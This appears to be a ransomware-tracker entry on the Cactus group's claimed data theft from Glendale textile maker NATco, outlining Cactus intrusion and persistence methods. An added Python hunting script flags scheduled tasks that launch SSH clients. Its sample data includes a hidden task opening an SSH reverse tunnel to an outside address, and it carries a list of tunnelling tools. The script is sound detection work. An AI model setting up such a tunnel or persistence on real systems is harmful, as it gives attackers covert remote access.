Ransomware Attack Hits North American Textile Company NATco

Incident Date:

September 17, 2024

Overview

Victim

North American Textile Company, LLC (NATco)

Attacker

Cactus

Location

Glendale, California, USA

First Reported

September 17, 2024

Ransomware Attack on North American Textile Company, LLC by Cactus Group

North American Textile Company, LLC (NATco), a textile manufacturer headquartered in Glendale, California, has been listed as a victim by the Cactus ransomware group, which claims to have exfiltrated a large volume of sensitive data from the company. Leak-site listings are the attackers' own claims rather than a confirmed incident report, but if the claim holds, the exposure threatens both the company's operations and its reputation.

About North American Textile Company, LLC (NATco)

Founded in 1991 and headquartered in Glendale, in the Los Angeles area of California, NATco supplies textiles to the apparel and home goods industries. The company operates more than 600 looms, printing presses and pieces of finishing equipment at sites across North America, Central and South America, Asia, Africa, Europe and the Middle East. It promotes sustainability practices aimed at reducing waste and its carbon footprint.

Details of the Attack

The Cactus ransomware group claimed responsibility for the attack on NATco on its dark web leak site. According to the listing, the stolen data spans employees' personal and corporate information, customer details, corporate correspondence and database backups. The listing already carries download links for the stolen data, so the exposure is no longer contingent on a ransom decision and the data should be treated as public rather than merely at risk. The listing also gives the company's annual revenue as $38.5 million and its main office as 346 W Cerritos Ave, Glendale, California.

About the Cactus Ransomware Group

First observed in March 2023, Cactus has quickly become a notable player in the ransomware landscape. The group gains initial access by exploiting vulnerabilities in VPN appliances and through phishing. Cactus is a double-extortion Ransomware-as-a-Service (RaaS) operation: data is exfiltrated before encryption, and the group threatens to publish it if the ransom is not paid. A distinctive trait of the payload is that the binary is itself stored in encrypted form and must be unpacked with a key supplied on the command line at run time, which hampers static detection by antivirus tools; victim files are then encrypted with AES, with the AES keys protected by RSA.

Penetration and Impact

Cactus typically gains access by exploiting known vulnerabilities in VPN appliances, notably Fortinet's, and in the Qlik Sense data analytics platform. Once inside a network, it maintains command and control over an SSH backdoor and uses scheduled tasks to keep that access across reboots, then moves on to data theft and encryption. Defenders should therefore prioritise patching internet-facing VPN and Qlik Sense instances and reviewing newly created scheduled tasks, particularly any that launch an SSH client. The group has claimed more than 100 victims, including large corporations in the United States, Italy, the UK, Switzerland and France, making it one of the fastest-growing ransomware threats of 2023.
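As an added example (not code from the page, the tracker, or any reporting on Cactus), the following Python script hunts for the persistence-plus-C2 pattern described above. It reads Windows Security event 4698 ("A scheduled task was created") records, parses the Task Scheduler XML each one carries, and flags tasks that launch an SSH client, escalating when the arguments open a reverse tunnel (`-R`) or a command-less session (`-N`), when the task is marked hidden, or when the binary sits outside trusted system directories. The event records, task names, file paths and the 203.0.113.10 address are constructed for the example; event ID 4698 and the Task Scheduler XML layout are real Windows conventions.

```python
"""Hunt Windows 4698 events for scheduled tasks that launch an SSH client.

Added example; the SAMPLE_EVENTS below are constructed, not real log data.
"""
import ntpath
import re
import xml.etree.ElementTree as ET

# Common SSH clients seen in tunnelling/backdoor setups on Windows hosts.
SSH_CLIENTS = {"ssh.exe", "plink.exe", "putty.exe", "kitty.exe"}
# -R opens a reverse tunnel back to the SSH server; -N keeps the session
# open without running a remote command (pure tunnel).
TUNNEL_FLAGS = re.compile(r"(?:^|\s)-(?:R|N)(?=\s|$)")
# Directories where a legitimately installed SSH client is expected to live.
TRUSTED_DIRS = (
    "c:\\windows\\system32\\",
    "c:\\program files\\",
    "c:\\program files (x86)\\",
)


def parse_task(task_xml):
    """Return (command, arguments, hidden) from Task Scheduler XML, or None."""
    root = ET.fromstring(task_xml)
    # {*} matches any namespace, so the task-schema namespace need not be spelled out.
    exec_node = root.find(".//{*}Actions/{*}Exec")
    if exec_node is None:
        return None
    command = (exec_node.findtext("{*}Command") or "").strip().strip('"')
    arguments = (exec_node.findtext("{*}Arguments") or "").strip()
    hidden = (root.findtext(".//{*}Settings/{*}Hidden") or "").strip().lower() == "true"
    return command, arguments, hidden


def assess_task(event):
    """Score one 4698 event; return a finding dict or None if not SSH-related."""
    parsed = parse_task(event["TaskContent"])
    if parsed is None:
        return None
    command, arguments, hidden = parsed
    binary = ntpath.basename(command).lower()
    if binary not in SSH_CLIENTS:
        return None
    reasons = [f"scheduled task runs SSH client {binary}"]
    if TUNNEL_FLAGS.search(arguments):
        reasons.append("tunnel flags (-R/-N) in arguments")
    if hidden:
        reasons.append("task marked hidden")
    if not command.lower().startswith(TRUSTED_DIRS):
        reasons.append(f"binary outside trusted directories: {command}")
    # One reason alone (an admin's backup job over SSH) is only worth a look;
    # three or more is the backdoor shape described in the text.
    severity = "high" if len(reasons) >= 3 else "medium"
    return {
        "task": event["TaskName"],
        "user": event["SubjectUserName"],
        "severity": severity,
        "reasons": reasons,
    }


def hunt(events):
    """Run assess_task over every 4698 event and collect the findings."""
    findings = []
    for event in events:
        if event.get("EventID") != 4698:
            continue
        finding = assess_task(event)
        if finding is not None:
            findings.append(finding)
    return findings


def task_xml(command, arguments, hidden=False):
    """Build a minimal Task Scheduler XML body (constructed, for the sample events)."""
    return (
        '<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">'
        f"<Settings><Hidden>{'true' if hidden else 'false'}</Hidden></Settings>"
        f"<Actions><Exec><Command>{command}</Command><Arguments>{arguments}</Arguments></Exec></Actions>"
        "</Task>"
    )


# Constructed sample events: a benign system task, an admin backup over SSH,
# and a hidden task that opens a reverse tunnel from an unusual location.
SAMPLE_EVENTS = [
    {"EventID": 4698, "SubjectUserName": "SYSTEM", "TaskName": "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag",
     "TaskContent": task_xml("%windir%\\system32\\defrag.exe", "-c -h -o -$")},
    {"EventID": 4698, "SubjectUserName": "backupadmin", "TaskName": "\\Maintenance\\NightlyBackup",
     "TaskContent": task_xml("C:\\Windows\\System32\\OpenSSH\\ssh.exe", "backup@fileserver run-backup")},
    {"EventID": 4698, "SubjectUserName": "svc_update", "TaskName": "\\Updater",
     "TaskContent": task_xml("C:\\ProgramData\\ssh\\ssh.exe",
                             "-i C:\\ProgramData\\ssh\\id -N -R 2222:127.0.0.1:3389 user@203.0.113.10",
                             hidden=True)},
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(f"[{finding['severity'].upper()}] {finding['task']} by {finding['user']}")
        for reason in finding["reasons"]:
            print(f"    - {reason}")
```

In production the records would come from the Security log (for example exported through `wevtutil` or a SIEM) rather than the constructed list, and the trusted-directory and client lists should be tuned to the estate; the point of the scoring is that a single SSH-based task is triage material, while a hidden task launching an SSH reverse tunnel from a data directory is the backdoor pattern worth an immediate response.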

Sources

Recent Ransomware Attacks

The Recent Ransomware Attacks (RRA) site acts as a watchtower, providing near real-time tracking of ransomware attacks, groups and their victims. Given threat actors' lucrative success so far, ransomware has become the most ubiquitous, and the most financially and informationally damaging, cyber threat to businesses and organizations today.

The site’s data is generated based on hosting choices of real-world threat actors, and a handful of other trackers. While sanitization efforts have been taken, we cannot guarantee 100% accuracy of the data. Attack updates will be made as source data is reported by reputable sources. By viewing, accessing, or using RRA you acknowledge you are doing so at your own risk.